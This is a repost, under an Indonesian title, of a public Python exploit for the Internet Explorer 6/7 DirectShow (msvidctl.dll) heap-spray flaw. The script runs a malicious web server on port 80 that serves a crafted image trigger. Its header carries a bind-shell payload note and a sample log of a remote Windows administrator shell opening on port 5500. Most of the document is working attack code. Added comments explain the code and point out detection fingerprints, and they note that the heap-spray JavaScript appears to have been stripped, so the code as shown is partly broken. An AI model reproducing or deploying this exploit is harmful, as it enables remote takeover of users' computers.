MS Internet Explorer 6,7 DirectShow (msvidctl.dll) exploit

Exploit Microsoft Video ActiveX yang menyerang Internet Explorer

#!/usr/bin/env python
######################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)     #
######################################################################################
#									             #
# Written by SecureState R&D Team 	                                             #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin              #
# http://www.securestate.com				 		             #
#									             #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind        #
#									             #
######################################################################################
# Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7                             #
######################################################################################
#										     #
# This exploit is publicly being exploited in the wild, opted to release this	     #
# to the research community. Microsoft is aware of the vulnerability.		     #
#										     #
######################################################################################
#										     #
# [-] Exploit sent... [-]							     #
# [-] Wait about 30 seconds and attempt to connect.[-]				     #
# [-] Connect to IP Address: 10.211.55.140 and port 5500 [-]		             #
#										     #
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500					     #
# Trying 10.211.55.140...							     #
# Connected to 10.211.55.140.							     #
# Escape character is '^]'.							     #
# Microsoft Windows [Version 5.2.3790]						     #
# (C) Copyright 1985-2003 Microsoft Corp.					     #
#									             #
# C:\Documents and Settings\Administrator\Desktop>				     #
#										     #
#										     #
# NOTE: The javascript code is not obfuscated in anyway, normal A/V should pick this #
# up. This is intentional.							     #
#										     #
# Improved reliability, appears to be about 95 percent of the time. Adjusted the     #
# spray size a bit.								     #
#										     #
######################################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys,binascii
try:
  import psyco
  psyco.full()
except ImportError:
   pass
class myRequestHandler(BaseHTTPRequestHandler):
 """Request handler for the exploit's HTTP server.

 Only GET is implemented (``do_GET``); any other method is rejected by the
 base class (HTTP 501). Two paths get a body: ``/`` returns the banner HTML
 and ``/ohn0es.jpg`` returns a fixed byte string. Every other path still
 receives a 200 with an empty body, because the response headers are sent
 before the path is inspected.
 """
 # NOTE: this try/except wraps the *definition* of the methods, which runs
 # once when the class body is executed. It does not catch exceptions raised
 # inside do_GET at request time.
 try:
  def do_GET(self):
    """Answer every GET with 200, then serve one of two fixed responses.

    Returns:
        None; the body is written directly to ``self.wfile``.
    """
    # Always Accept GET
    self.printCustomHTTPResponse(200)
    # trigger the overflow *boom*
    # Detection note: the request path, the byte string below and the
    # "Server: myRequestHandler" header are all fixed values, so any of
    # them is a straightforward proxy/IDS match for this sample.
    if self.path == "/ohn0es.jpg":
       unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00")
       self.wfile.write(unhex)
    if self.path == "/":
        # Peer IP of the requesting browser; used only for the console message.
        target=self.client_address[0]
        # NOTE(review): the writes below carry no script body and the
        # "<!--mce:0-->" placeholder looks like a blog-editor artifact; the
        # heap-spray script mentioned in the header appears to have been
        # stripped from this copy, so as listed "/" only returns the banner.
        self.wfile.write("""""")
        self.wfile.write("""
        <script type="text/javascript"><!--mce:0--></script>
<div id="DivID">""")
        self.wfile.write("""""")
        self.wfile.write("""<span style="color: white;">
                ###############################################################################
 
MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)
 
Written by SecureState R&amp;D Team
 
Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin
 
http://www.securestate.com
 
win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind
 
Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7
 
###############################################################################
 
""")
        # Console message only; the port number here comes from the header
        # comment (the bind payload's LPORT), not from anything this code sets.
        print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target))
  # Print custom HTTP Response
  def printCustomHTTPResponse(self, respcode):
    """Send the status line plus fixed Content-type/Server headers.

    Args:
        respcode: HTTP status code passed to ``send_response``.
    """
    self.send_response(respcode)
    self.send_header("Content-type", "text/html")
    # Fixed, non-default Server banner: an easy fingerprint for this script.
    self.send_header("Server", "myRequestHandler")
    self.end_headers()
 
 # In case of exceptions, pass them
 # Only reached if defining the methods above raised, which it cannot in
 # practice; request-time errors are handled by the base class instead.
 except Exception:
    pass
 
# Bind every local interface on TCP port 80 (typically a privileged port);
# requests are dispatched to the handler class defined above.
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
#####################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)    #
#####################################################################################
#                                                                                   #
# Written by SecureState R&amp;D Team                                                   #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin             #
# http://www.securestate.com                                                        #
#                                                                                   #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind       #
#                                                                                   #
#####################################################################################
#        Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7                     #
#####################################################################################
""")
print ("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("\n\nType -c to exit..")
try:
     # handle the connections
     # handle_request() services exactly one request; serve_forever() then
     # takes over and loops until the process is interrupted.
     httpd.handle_request()
     # Serve HTTP server forever
     httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
# Ctrl-C is the only exit path; the process terminates with status 1.
except KeyboardInterrupt:
       print ("\n\nExiting exploit...\n\n")
       sys.exit(1)

